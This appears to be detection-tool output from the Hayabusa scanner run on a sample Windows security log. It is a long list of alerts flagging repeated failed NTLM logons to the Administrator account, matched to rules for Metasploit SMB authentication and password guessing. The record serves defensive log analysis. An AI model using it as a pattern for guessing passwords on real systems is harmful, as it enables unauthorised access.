SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: 
